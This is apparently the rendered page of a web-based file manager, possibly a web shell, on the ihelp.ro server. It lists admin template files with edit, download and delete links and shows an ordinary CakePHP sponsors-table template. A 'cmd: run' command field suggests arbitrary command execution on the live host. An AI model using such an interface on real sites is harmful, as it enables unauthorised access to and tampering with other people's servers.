/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
templates
/
Admin
/
Sponsors
/
/var/www/vhosts/ihelp.ro/httpdocs/templates/Admin/Sponsors
mkdir
upload
Name
Size
Mode
Actions
add.php
1335
0644
edit
dl
rm
edit.php
1571
0644
edit
dl
rm
index.php
2546
0644
edit
dl
rm
view.php
4150
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/templates/Admin/Sponsors/index.php
(2546B)
<!-- Content Header (Page header) --> <section class="content-header"> <div class="container-fluid"> <div class="row mb-2"> <div class="col-lg-12"> <h1> <?php echo __('Sponsors'); ?> <div class="float-right"><?php echo $this->Html->link(__('New'), ['action' => 'add'], ['class' => 'btn btn-success btn-xs']); ?></div> </h1> </div> </div> </div><!-- /.container-fluid --> </section> <!-- Main content --> <section class="content"> <div class="container-fluid"> <div class="row"> <div class="col-lg-12"> <div class="card"> <!-- /.box-header --> <div class="card-body table-responsive table-responsive p-0"> <table class="table table-hover text-nowrap"> <thead> <tr> <th scope="col"><?php echo $this->Paginator->sort('id'); ?></th> <th scope="col"><?php echo $this->Paginator->sort('name'); ?></th> <th scope="col"><?php echo $this->Paginator->sort('description'); ?></th> <th scope="col"><?php echo $this->Paginator->sort('image'); ?></th> <th scope="col" class="actions text-center"><?php echo __('Actions'); ?></th> </tr> </thead> <tbody> <?php foreach ($sponsors as $sponsor) : ?> <tr> <td><?php echo $this->Number->format($sponsor->id); ?></td> <td><?php echo h($sponsor->name); ?></td> <td><?php echo h($this->Text->truncate($sponsor->description, 50)); ?></td> <td><?php echo $this->Html->image($sponsor->image, ['alt' => 'Sponsor Image', 'width' => '80', 'height' => '30']); ?></td> <td class="actions text-center"> <?php echo $this->Html->link(__('View'), ['prefix' => 'Admin', 'controller' => 'Sponsors', 'action' => 'view', $sponsor->id], ['class' => 'btn btn-info btn-xs']); ?> <?php echo $this->Html->link(__('Edit'), ['action' => 'edit', $sponsor->id], ['class' => 'btn btn-warning btn-xs']);?> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <!-- /.box-body --> </div> <!-- /.box --> </div> </div> <div class="row"> <div class="col-sm-12"> <?php echo $this->element('paginator'); ?> </div> </div> </div> </section>
Save
cmd:
run